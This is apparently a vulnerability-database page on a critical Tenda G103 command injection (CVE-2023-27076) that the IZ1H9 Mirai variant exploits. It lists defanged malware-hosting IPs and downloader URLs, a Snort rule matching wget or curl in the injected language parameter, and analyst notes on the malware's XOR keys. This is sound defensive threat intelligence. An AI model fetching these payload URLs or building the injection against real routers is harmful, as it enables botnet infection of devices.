cbcvebase.
CVE-2023-27076
published 2023-04-10

CVE-2023-27076: Command injection vulnerability found in Tenda G103 v.1.0.0.5 allows attacker to execute arbitrary code via a the language parameter.

PriorityP183critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
22.93%
97.5th percentile
Command injection vulnerability found in Tenda G103 v.1.0.0.5 allows attacker to execute arbitrary code via a the language parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
tendag103_firmware

Detection & IOCsextracted from sources · hover to see the quote

ip163.123.143[.]126
filenamelb.sh
urlhxxp://163.123.143[.]126/bins/dark.x86
urlhxxp://163.123.143[.]126/bins/dark.mips
urlhxxp://163.123.143[.]126/bins/dark.mpsl
urlhxxp://163.123.143[.]126/bins/dark.arm4
urlhxxp://163.123.143[.]126/bins/dark.arm5
urlhxxp://163.123.143[.]126/bins/dark.arm6
urlhxxp://163.123.143[.]126/bins/dark.arm7
urlhxxp://163.123.143[.]126/bins/dark.ppc
urlhxxp://163.123.143[.]126/bins/dark.m68k
urlhxxp://163.123.143[.]126/bins/dark.sh4
urlhxxp://163.123.143[.]126/bins/dark.86_64
urlhxxp://2.56.59[.]215/i.sh
urlhxxp://212.192.241[.]72/lolol.sh
ip2.56.59[.]215
ip195.133.40[.]141
urlhxxp://31.210.20[.]100/lolol[.]sh
urlhxxp://212.192.241[.]72/lolol[.]sh
urlhxxp://212.192.241[.]87/bins/
domaindotheneedfull[.]club
ip193.47.61[.]75
path/cgi-bin/luci?language=
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Tenda G103 Command Injection Attempt (CVE-2023-27076)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/luci?language="; fast_pattern; startswith; pcre:"/(?:(wget|curl))/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-iz1h9/; reference:cve,2023-27076; classtype:attempted-admin; sid:2048547; rev:1; metadata:attack_target IoT, created_at 2023_10_12, cve CVE_2023_27076, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_10_12, reviewed_at 2023_10_12, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services; target:dest_ip;)
  • Exploit targets the `language` parameter via HTTP GET to /cgi-bin/luci; look for wget or curl in the URI (PCRE match on the language parameter value)
  • IZ1H9 configuration strings are XOR-encrypted with effective single-byte key 0xEA (derived from table key 0xBAADF00D); scan for this decryption pattern in samples
  • Telnet/SSH credential brute-force uses a 1-byte XOR key 0x54 to encrypt ~100 pairs of default login credentials in the scanner function
  • Palo Alto Threat Prevention signatures 93386, 93718, 93721, 93722 cover the exploit traffic and malware associated with this campaign
  • In the Tenda exploit function the malware mistakenly downloads tenda.sh but executes netlog.sh — network detection should still alert on the download of tenda.sh from the malware host
  • ·The Tenda G103 exploit payload in this IZ1H9 sample is broken: it downloads tenda.sh but attempts to execute netlog.sh, so the exploit will not successfully execute the intended downloader
  • ·Multiple campaigns share the same XOR key (0xBAADF00D / effective 0xEA) and near-identical shell script downloaders, suggesting a single threat actor operating across campaigns since November 2021

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.